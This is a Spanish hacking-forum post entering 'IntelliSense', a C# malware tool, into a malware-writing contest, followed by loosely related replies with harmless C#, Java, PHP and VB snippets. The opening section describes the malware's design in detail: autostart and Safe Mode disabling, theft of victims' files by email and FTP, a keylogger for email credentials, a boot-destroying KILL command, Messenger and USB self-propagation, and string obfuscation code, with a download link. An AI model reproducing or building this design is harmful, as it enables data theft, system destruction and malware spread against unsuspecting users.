Aunque en la pagina ya es 18 en mi pais sigue siendo 17  , queria presentar este tema para el concurso de Abril Negro:

http://foro.elhacker.net/analisis_y_diseno_de_malware/intellisense_control_via_web_robo_de_informacion-t255155.0.html

Autor: 43H4FH44H45H4CH49H56H45H
Nombre de la Herramienta:  IntelliSense
Lenguaje: C#.NET
Descripcion:
IntelliSense es una técnica que se me ocurrió para sacar información  y obtener control remoto de una PC o Red enviando ordenes vía web desde cualquier equipo público o privado y cualquier Sistema Operativo con un navegador o cliente FTP.
IntelliSense puede ser aplicado al lenguaje de programación que más nos guste.
Como funciona?
Al iniciar el programa verificara si se encuentra en una cuenta de  Administrador u otro tipo, dependiendo de la cuenta elegirá donde se copiara y si modificara el registro para el auto inicio, deshabilitado del Safe Mode y otras cosas.
Una vez realizada la autocopia listara los archivos que se encuentren en Mis Documentos y el Escritorio para enviarlos vía mail (escogí Gmail para la demostración) a nuestra cuenta además de algunos datos de la víctima. Luego empezara a leer las ordenes web que se encuentren en un archivo "1.txt" que tengamos alojado en alguna pagina web con el siguiente formato:
"PC:ORDEN"
Donde "PC" puede corresponder a la IP pública, IP privada, Nombre de Usuario o Nombre de Usuario de Dominio  para poder enviar la orden a una máquina especifica y si necesitáramos enviarla a todos los PC's se puede usar ALL.
"ORDEN" se refiere a la orden que enviamos a la PC el diseño actual cuenta con
4 ordenes:
CAPTURA: que envía vía mail una captura de pantalla.
KILL: que reemplaza los archivos principales de arranque para evitar el inicio de Windows y reinicia el equipo.
KEYLOG: que envía los datos sustraídos (si los hubiera) de cuentas de correo (páginas en español) como GMAIL, Windows Live Messenger, Hotmail ,Yahoo u otras que especifiquemos.
default: que envía por FTP uno, varios o todos los archivos que queramos utilizando Winrar para comprimirlos, si por ejemplo pusiéramos en la orden:
"*.*" enviara todos los archivos listados
"*.JPG" enviara solo los archivos con dicha extensión.
"documentos.doc" enviara dicho archivo.

Tb cuenta con métodos de protección matando el proceso del Task Manager y si se ingresa a la carpeta donde se encuentre activara la protección igual que con "KILL".
El keylogger solo se activa cuando se ingresa a las páginas que especifiquemos  y cada media hora si hay datos que enviar lo hará vía mail.
En la propagación por Messenger lista todos los contactos que se encuentren en la cuenta actual e ira enviando un link de descarga y una copia de si mismo comprimida a cada contacto, si el contacto esta "conectado" recibirá el link de descarga mas la copia comprimida, en otra caso recibirá solo el link de descarga.
En la replicación por USB listara las carpetas de la unidad USB y las ocultara para luego crear copias de sí mismo con los nombres de dichas carpetas (ya se ha visto en replicación USB).
Además cuenta con la posibilidad de complicar un poco la lectura de los string's utilizados mediante conversión de cada carácter en su valor decimal, para automatizar esto se puede usar un pequeño programa que tenga 3  textBox y un button con el siguiente código:

textBox2.Text = "";
foreach (char a in textBox1.Text)
{
 textBox2.Text +=  Convert.ToInt32(a) + " ";
}
textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";

string cadena = "";
 
foreach (int i in variable)
{
  cadena  += encod(i);
}
 
 
private string encod(int num)
{
string codif = char.ConvertFromUtf32(num);
return codif;
}

Un ejemplo de su aplicación está  en "private void regist()". Además la modificación al registro permite que la autocopia al sistema tenga cualquier extensión, es decir si se copiara como *.txt igualmente se ejecutaría.

Todavía falta agregar y corregir algunos detalles como detección y captura de cámaras disponibles y algunas cosas más.
Link de descarga del proyecto:


http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html

...

Respecto al tema, según entiendo habría plazo de publicar nuevos trabajos hasta el 17 de mayo, lo digo para empezar a diseñar el mío y posteriormente publicarlo.

Parqa lo k necesitas bastaria con un email por smtp que muestre la IP y algun dato mas de donde se conecto para comparar y evitar contar repeticiones de uso o reporte.
Si no kieres estar con lo de los mail's, puedes utilizar web services que hasta con las versiones express del vs 2008 se hacen en un pestañeo, en una operacion del web service creas un FileStream y un StreamWriter para que escriba un .txt y vaya añadiendo fecha e IP de la que se conecto, o mas simple solo haces leer el txt y luego de una conversion a "int" aumentas el valor y actualizas el mismo.
Puedes crear igualmente una operacion para conectar a un BD MSSQL, MYSQL u ORACLE y lo mismo.
Hay muchos modos de hacerlo, si vas a utilizar un web services creado con el vs studio necesitas un servidor que corra con windows y demas, en caso de tener un server con linux necesitas crear tu propio web services para consumirlo desde aplicaciones windows necesitas saber (XML, SOAP, WSDL, y UDDI) y el resto es sencillo.
Si quieres tb lo puedes crear en python que tiene bastante informacion al respecto, el tema es demasiado amplio para detallarlo, mejor si piensas el mejor método que se acomode a tu uso.

Esto te puede servir:

import java.io.*;

public static void main(String[] args) {
 
    FileInputStream origen = null;
    FileOutputStream destino = null;
 
    try
    {
        origen = new FileInputStream("C://1.jar");
        destino = new FileOutputStream("D://2.jar");
        byte[] buf = new byte[4096];
        int byt;
        while ((byt = origen.read(buf)) != -1)
        destino.write(buf, 0, byt);
    }
    catch (IOException e) {
        System.err.println( "error: " + e.getMessage());
     }
    }

A la rápida hice un ejemplo fijate si te sirve:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Collections;
namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        ArrayList lista = new ArrayList();
        int contador = 0;
        public Form1()
        {
            InitializeComponent();
        }
 
        private void Form1_Load(object sender, EventArgs e)
        {
 
            lista.Add("user");
            lista.Add("admin");
        }
 
        private void button1_Click(object sender, EventArgs e)
        {
            if (contador > 1) Application.ExitThread();
            if (textBox1.Text.Length < 1) MessageBox.Show("Introduzca un nombre");
            else
            {
                if (lista.Contains(textBox1.Text.Trim()))
                {
                    contador++;
                    MessageBox.Show("Nombre de usuario en uso");
                    textBox1.Text = "";
                }
                else
                {
                    lista.Add(textBox1.Text.Trim());
                    textBox1.Text = "";
                }
            }
        }
 
    }
}
 

Falta perfeccionar pero funciona.

Para dibujar circulos puedes hacerlo asi:

private void button1_Click(object sender, EventArgs e)
        {
            circulos(10, 20, 20, 20); // coordenada X,Y, ancho, alto
            circulos(5, 10, 40, 40); // coordenada X,Y, ancho, alto
 
        }
        private void circulos(int X, int Y, int W, int Z)
        {
            System.Drawing.Graphics graphics = this.CreateGraphics();
            System.Drawing.Rectangle rectangle = new System.Drawing.Rectangle(X, Y,W,Z);
            graphics.DrawEllipse(System.Drawing.Pens.Red, rectangle);
        }

luego lo adaptas a tu proyecto, en el ejemplo se dibuja dos circulos en el mismo form, puedes hacerlo de igual manera en una imagen o similar.

Agregalo como un recurso en tu proyecto y luego accedes a dicho recurso en tiempo de ejecución, más información en el MSDN.

Para sacar la Ip pública podrias hacerlo mediante una página php que solo tenga

<?php
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR']; 
echo $ip;
?>

en cualquier servidor.

Y en el form de visual basic agregando inet al mismo:

Text1.Text = Inet1.OpenURL("http://www.dominio.xxx/ip.php")
Text1.SelStart = Len(Text1.Text) - 34
Text1.SelLength = 15
Text1.Text = Text1.SelText

Puesto que las direcciones IP pueden ser menores a 15 digitos, se puede utilizar InStr o InStrRev delimitando la direccion ip en la pagina php mediante caracteres especiales para obtenerla sin algun caracter demás.
Luego de obtener todos los datos puedes enviarlo por mail o ftp para automatizar la tarea, aunque este método es prehistorico puesto que lo mas apropiado es hacerlo mediante Web Services.